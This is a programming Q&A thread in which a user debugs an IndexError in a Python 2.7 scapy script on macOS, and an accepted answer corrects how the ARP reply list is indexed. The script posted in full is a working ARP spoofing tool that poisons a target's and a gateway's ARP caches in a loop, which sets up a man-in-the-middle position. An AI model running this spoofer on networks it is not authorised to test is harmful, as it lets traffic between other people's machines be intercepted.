# macOS python 2.7 error : IndexError: list index out of range

Tags: python, python-2.7, indexing

```
    #!/usr/bin/env python

import scapy.all as scapy
import time
import sys
import argparse


def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', dest='target_ip', help='[+] IP of target')
    parser.add_argument('-g', '--gateway', dest='gateway_ip', help='[+] IP of gateway')
    return parser.parse_args()


def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
    arp_request_broadcast = broadcast / arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    return answered_list[0][1].hwsrc


def restore(destination_ip, source_ip):
    destination_mac = get_mac(destination_ip)
    source_mac = get_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
    scapy.send(packet, count=4, verbose=False)


def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)


options = get_arguments()
sent_packets_count = 0
try:
    while True:
        spoof(options.target_ip, options.gateway_ip)
        spoof(options.gateway_ip, options.target_ip)
        sent_packets_count = sent_packets_count + 2
        print('\r[+] Packets sent : ' + str(sent_packets_count)),
        sys.stdout.flush()
        time.sleep(2)
except KeyboardInterrupt:
    restore(options.target_ip, options.gateway_ip)
    restore(options.gateway_ip, options.target_ip)
    print('\n[+] Restoring ARP tables...\n[+] Quitting...')
```

updated question with full code

having trouble using this function on macOS. it seems to me my indexes arecorrect so wondering if this is a macOS compatability issue? getting the standard `IndexError: list index out of range` ? does my indexing look wrong to anyone?

Comment: have you tried inspecting answered_list[0]? are you sure you didn't just forget the [0] at the end of the previous line?

Answer (score 0, accepted):

**Updated:**

In the `answered_list`, it is a list of tuple with two elements in it--`send`, `receive`.
Can you try this way:

```
ans, unans = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)
return(str(ans[0][1].hwsrc))
```

If you still have the error, you need to print out the length of the `ans` to see where is the issue:

```
ans, unans = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)
print(len(ans))
print(len(ans[0]))
print(len(ans[0][1]))
```

Example:

```
ans, unans = scapy.srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=IP), timeout=2, iface=self.interface, inter=0.2)

for send, receive in ans:
    return receive.sprintf(r"%Ether.src%")
```

Let us know.

**Previous Answer:**

What is the full error log that includes which line has the issue? Please give more code that we can reproduce, such as what data look like, and what library you used etc..

See this line:

```
answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
```

You already get the first element using `[0]`, then in your return you did it again:

```
return answered_list[0][1].hwsrc
```

I think the correct code should be:

```
return answered_list[1].hwsrc
```

Hope this helps.

Comment: it looks like the first index[0] is correctly pulling the dictionary index and then refrencing the [1] value for the aquired mac address but ...

Comment: ans, unans = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)
return(str(ans[0][1].hwsrc)) . -----this worked.. now let me research why... thank you